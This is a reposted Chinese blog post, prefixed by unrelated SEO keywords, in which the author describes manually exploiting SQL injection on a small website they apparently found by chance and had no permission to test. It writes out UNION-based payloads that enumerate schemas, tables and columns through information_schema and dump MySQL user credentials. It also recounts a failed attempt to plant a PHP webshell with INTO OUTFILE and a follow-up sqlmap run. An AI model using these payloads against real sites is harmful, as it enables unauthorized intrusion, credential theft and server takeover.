成都网站建设外包,北京朝阳区哪里有网站开发,制作网线颜色顺序,wordpress 媒体文件发布本来想找个装安全狗的站试下绕过#xff0c;safe dog没找到#xff0c;但随便一搜搜到一个小站有SQLi#xff0c;正好借此机会复习下手工注入#xff08;新版Firefox我吐槽一下#xff0c;hackbar这么好用的工具#xff0c;说阉割就阉割#xff0c;哎#xff09; 小站没…本来想找个装安全狗的站试下绕过safe dog没找到但随便一搜搜到一个小站有SQLi正好借此机会复习下手工注入新版Firefox我吐槽一下hackbar这么好用的工具说阉割就阉割哎 小站没有上WAF用11、12就可以检测注入点就不放截图了。 然后order by 、联合查询什么的也都是基本操作。。直接进入最关键的手工爆表好了。已知第二列和第三列有回显MySQL version是5.6所以直接从information_schema中就可以方便的查询 1、爆其他数据库 查询语句为xxx?id-4 union select 1,SCHEMA_NAME,3,4,5,6,7,8 FROM information_schema.schemata 页面返回为 2、爆其他表数据库选择刚才爆出的mysql 查询语句为xxx?id-4 union select 1,TABLE_NAME,3,4,5,6,7,8 FROM information_schema.tables WHERE TABLE_SCHEMA0x6d7973716c 这里的0x6d7973716c是mysql的十六进制表示如果直接写mysql字符串的话数据库是不能解析的所以要传递16进制形式的数据库名 这里有很多表我们只需关注user表就可以其实其他的表也会存放一些敏感数据比如该网站的注册会员的登录信息等等但我们目标是服务器。 3、爆字段 查询语句为xxx?id-4 union select 1,COLUMN_NAME,3,4,5,6,7,8 FROM information_schema.columns WHERE TABLE_NAME0x75736572 同理0x75736572是user表的十六进制表示。 这里我们可能关心的是以上三列的数据user、password、host让我们进行最后的爆数据吧 4、爆数据 查询语句为xxx?id-4 union select 1,concat_ws(0x2c,User,Password,Host),3,4,5,6,7,8 FROM mysql.user 由于我要查询的有三列数据所以这里我用了concat_ws函数进行拼接后输出0x2c是逗号 done手工测试到此完成可以说是非常非常普通的正规思路了没有一点绕过的地方直接搞就行了。 其实这里我尝试用into outfile写php的一句话木马但是发现没有成功编码也不行一直报mysql_fetch_array(): supplied argument is not a valid MySQL result resource的错误。 查了一些资料使用mysql直接写入木马的必要条件有三 1、root权限排除 2、知道网站根目录的地址排除从随便一个报错信息中都可以爆出物理绝对路径 3、magic_quotes_gpc()OFF有可能 4、没有write权限有可能 用sqlmap跑下试试看来的确如此 大概就这些吧。 ######################### 谁能告诉我为什么发布以后布局这么丑蛋疼转载于:https://www.cnblogs.com/co10rway/p/7979750.html